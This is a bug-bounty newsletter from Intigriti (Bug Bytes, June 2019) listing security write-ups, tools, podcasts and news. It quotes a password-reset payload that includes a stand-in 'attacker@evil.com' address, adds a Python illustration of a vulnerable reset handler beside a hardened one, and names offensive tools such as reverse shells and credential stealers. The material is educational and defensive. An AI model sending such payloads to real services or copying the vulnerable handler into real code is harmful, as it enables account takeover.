By Intigriti
June 11, 2019
Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series is curated by Mariem, better known as PentesterLand. Every week, she keeps us updated with a comprehensive list of all write-ups, tools, tutorials and resources we should not have missed.
Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.
This issue covers the week from 31 of May to 07 of June.
Foxyproxy.json for disabling distracting Firefox traffic from Burp
If you’re a regular Firefox + Burp user, you probably have noticed that Firefox generates some traffic that shows up in Burp, like requests to http://detectportal.firefox.com/ or update checks.
This JSON file is @liamosaur’s FoxyProxy configuration file, which disables this unwanted traffic.
This isn’t a fully disclosed writeup, but the little information shared is mind-boggling.
Ilya/exadmin was able to steal other users’ password reset link by entering an array of email addresses instead of one email address.
The request’s body looked like this: {"email_address":["admin@breadcrumb.com","attacker@evil.com"]}.
It would be interesting to see what the backend code looks like, but even without knowing this is an interesting idea to try on other programs.
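As an added illustration, not code from the original write-up (whose backend was never disclosed), here is a hypothetical Python reconstruction of how a "string or array" type confusion in a password reset endpoint can leak a victim's reset token, next to a handler that enforces the parameter's type and only ever mails the address stored on the account record. The user store, the request bodies and the `reset_vulnerable`/`reset_hardened` functions are all assumptions constructed for the example.

```python
import json
import re
import secrets

# Constructed sample data for the example (not from the original report).
USERS = {
    "admin@breadcrumb.com": {"id": 1, "email": "admin@breadcrumb.com"},
}
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")

# Constructed request bodies: a normal request and the array variant.
SINGLE_BODY = '{"email_address": "admin@breadcrumb.com"}'
ARRAY_BODY = '{"email_address": ["admin@breadcrumb.com", "attacker@evil.com"]}'


def mint_token() -> str:
    """Unguessable reset token (hypothetical; real code also stores it with an expiry)."""
    return secrets.token_urlsafe(32)


def reset_vulnerable(body: str) -> list[tuple[str, str]]:
    """Hypothetical vulnerable handler: it never checks the JSON type of
    email_address, so a list is silently accepted. The account lookup
    succeeds because the victim's address is in the list, and the single
    token minted for that account is then mailed to every listed address.
    Returns the (recipient, token) pairs that would be queued for delivery."""
    data = json.loads(body)
    recipients = data.get("email_address", [])
    if isinstance(recipients, str):
        recipients = [recipients]
    if not any(r in USERS for r in recipients):
        return []
    token = mint_token()
    # Bug: the mail is addressed to the raw request value, not the account.
    return [(r, token) for r in recipients]


def reset_hardened(body: str) -> list[tuple[str, str]]:
    """Hardened handler: reject anything that is not a single well-formed
    e-mail string, then deliver only to the address on the account record."""
    data = json.loads(body)
    addr = data.get("email_address")
    if not isinstance(addr, str) or not EMAIL_RE.match(addr):
        raise ValueError("email_address must be a single e-mail address string")
    account = USERS.get(addr.lower())
    if account is None:
        # Same shape of response as a hit, so the endpoint does not reveal
        # which addresses have accounts.
        return []
    token = mint_token()
    # Recipient comes from the stored record, never from the request body.
    return [(account["email"], token)]


def hardened_rejects(body: str) -> bool:
    """True if the hardened handler refuses the body with a validation error."""
    try:
        reset_hardened(body)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable, array body :", reset_vulnerable(ARRAY_BODY))
    print("hardened, single body  :", reset_hardened(SINGLE_BODY))
    print("hardened rejects array :", hardened_rejects(ARRAY_BODY))
```

The same type check applies to every identity-bearing parameter (username, phone number, account id): a schema validator that pins each field to one JSON type removes this whole class of "what if I send an array" probes, and a log entry for rejected bodies gives the defender a cheap detection signal.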
@0xpatrik shares his new subdomain enumeration workflow.
I know, there are already dozens (hundreds?) of subdomain enumeration articles out there, and @0xpatrik himself already talked about this same topic… but here he shows how he improved his methodology for more efficiency and better results. Interested yet?
This is a great guide for anyone interested in Web app security or bug bounty. It has 3 sections that correspond to the following learning phases:
Basics of Networks, Programming & Automation
Learning about Vulnerabilities, Resource for practicing, Tools…
Selecting a target, starting tests & writing reports
Each phase is explained with the necessary resources to get you started. So if you don’t know where to start, this is perfect!
DirectoryImporter is a Java Burp Suite extension that allows you to import directory bruteforcing results into Burp.
Until now, the alternative was to proxy bruteforcing tools through Burp to check the results (or do it manually).
So this can be pretty handy. For now, only Dirsearch and Gobuster are supported. But you can add any other bruteforcing tool you want by adding a parser.
My Entrepreneurial Journey – Episode 2: Week One of Business Ownership
Bug Bounty World’s Pranav Hivarekar Interviews Rahul Maini – Bug Bounty Talks
AusCERT2019 Day 1 – Heidi Winter (Intro to CTFs)
Coalcast Episode 5 PT 1 – Marcello Salvati (Byt3bl33d3r) and Dan McInerney
Application Security Podcast: Björn Kimminich — The new JuiceShop, GSOC, and Open Security Summit
Smashing Security 131: Zap yourself from the net, and patch now against BlueKeep
API Security Project: API Security Top 10 project launched by OWASP
The Darkside of Red-Teaming? Common Traps & Pitfalls In Recent Red-Teaming
IP Disclosure of Servers Behind WAFs Using WordPress XML-RPC
Syncing yourself to Global Administrator in Azure Active Directory
Hidden Helpers: Security-Focused HTTP Headers & Security Header Scanner
Top GitHub Dorks and Tools Used to Scan GitHub Repositories for Sensitive Data
Microsoft Edge Extensions Host Permission Bypass (CVE-2019-0678)
We Decide What You See: Remote Code Execution on a Major IPTV Platform
NVIDIA GeForce Experience OS Command Injection CVE-2019-5678
Open redirect on Upserve ($1,200)
Authorization flaw on Shopify ($2,000)
CSP bypass on Paypal ($900)
See more writeups on The list of bug bounty writeups.
GPOCheck: Tool for auditing GPO on Windows AD
Seccubus: Automates vulnerability scanning with: Nessus, OpenVAS, NMap, SSLyze, Medusa, SkipFish, OWASP ZAP and SSLlabs
Ansible-burp_extensions: Ansible playbook to install Burp extensions
Cloud_enum: Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud
H2buster: A threaded, recursive, web directory brute-force scanner over HTTP/2
Venom: Auto Recon Bash Script
Liffy: Local file inclusion exploitation tool
Taint’em All: Taint analysis tool for PHP
Fatt /fingerprintAllTheThings: A pyshark based script for extracting network metadata and fingerprints from pcap files and live network traffic
Leprechaun & Tutorial: This tool is used to map out the network data flow to help penetration testers identify potentially valuable targets.
Mirage: A powerful and modular framework dedicated to the security analysis of wireless communications
CloudCopy: Stealing hashes from Domain Controllers in the Cloud
Byepass: Automates a large number of password cracking tasks using optimized dictionaries and mangling rules
Zydra: A file password recovery tool and Linux shadow file cracker. It uses the dictionary search or Brute force method for cracking passwords
Recsech: Websites footprinting and recon tool. It collects DNS Information, subdomains, Subdomain takeovers, does Github recon, detects honeypots…
Sshd-poison: A tool to get creds of pam based sshd authentication
ReverseTCPShell: Reverse Encrypted (AES) Shell over TCP using PowerShell SecureString, to Bypass Detection (FW\AV\IPS\IDS). Useful for RedTeams
WordLists-20111129: Lists of words based on common web directory and file names
Mobile: Xecurity Labs mobile security & applications reports
secDevLabs: Laboratory for those who are interested in learning about web security
Get “Breaking into Information Security: Learning the Ropes 101” for free until the end of the month
Cookies with SameSite by default: “‘SameSite’ is a reasonably robust defense against some classes of cross-site request forgery (CSRF) attacks, but developers currently need to opt-into its protections by specifying a SameSite attribute. In other words, developers are vulnerable to CSRF attacks by default.”
Microsoft Windows RDP Network Level Authentication Bypass (CVE-2019-9510): What You Need to Know
Cryptocurrency startup Komodo hacks itself to protect its users’ funds from hackers
‘A Windows flaw so bad, even the NSA is begging users to update’
BlueKeep ‘Mega-Worm’ Looms as Fresh PoC Shows Full System Takeover: “A working exploit for the critical remote code-execution flaw shows how an unauthenticated attacker can achieve full run of a victim machine in about 22 seconds.”
New adware “BeiTaAd” found hidden within popular applications in app store
Plot to steal cryptocurrency foiled by the npm security team
Google confirms that advanced backdoor came preinstalled on Android devices
The “pizza” method – a new way for hackers to get company data
Apple launches privacy-focused login tech to throw web trackers off users’ scent
Apple sunsets iTunes: iTunes will be replaced with 3 standalone desktop apps called Music, Podcasts & TV
Don’t blink, but 5G is about to change a lot more than just watching movies
This is how hackers make money from your stolen medical data
We created a collection of our favorite pentest & bug bounty related tweets shared this past week. You’re welcome to read them directly on Twitter: Tweets from 05/31/2019 to 06/07/2019.
Subscribe to the newsletter here!
Disclaimer:
The views and opinions expressed in this article are those of the curators and do not necessarily reflect the position of intigriti.
Curated by Pentester Land & Sponsored by Intigriti